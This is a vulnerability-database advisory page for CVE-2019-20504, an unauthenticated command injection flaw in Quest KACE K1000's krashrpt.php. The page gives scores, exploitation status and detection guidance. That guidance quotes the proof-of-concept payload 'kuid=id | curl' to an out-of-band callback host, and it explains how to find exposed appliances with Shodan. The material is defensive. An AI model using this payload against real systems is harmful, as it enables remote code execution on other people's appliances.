cbcvebase.
CVE-2019-20504
published 2020-03-09

CVE-2019-20504: service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell…

PriorityP181critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
9.18%
94.7th percentile
service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
questkace_systems_management< 6.4.1208226.4.120822

Detection & IOCsextracted from sources · hover to see the quote

path/service/krashrpt.php
commandPOST /service/krashrpt.php HTTP/1.1 | kuid=id | curl http://{{interactsh-url}}
  • Detect exploitation attempts by monitoring POST requests to /service/krashrpt.php containing shell metacharacters (e.g., |, ;, `, $()) in the 'kuid' parameter.
  • Use an out-of-band (OOB) DNS/HTTP interaction callback to confirm blind RCE — the exploit PoC uses 'kuid=id | curl http://<interactsh-url>' and confirms exploitation via DNS interaction.
  • Fingerprint vulnerable K1000 appliances exposed on the internet via Shodan using the HTML keyword 'K1000 Logo'.
  • The endpoint /service/krashrpt.php is unauthenticated; any POST to this path with a 'kuid' parameter containing shell metacharacters should be treated as a high-confidence attack indicator.
  • ·The Nuclei template uses a two-step flow: first confirming the target is a K1000 appliance (body contains 'K1000'), then sending the exploit payload. Detection logic should similarly chain host fingerprinting with payload inspection to reduce false positives.
  • ·Exploitation is confirmed via out-of-band DNS callback (interactsh), meaning network-level egress filtering on the target appliance may prevent callback-based detection even when the vulnerability is present and exploitable.
  • ·Affected versions are strictly before 6.4 SP3 (6.4.120822); version 6.4.120756 is explicitly cited as vulnerable. Detections should be scoped to these versions.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.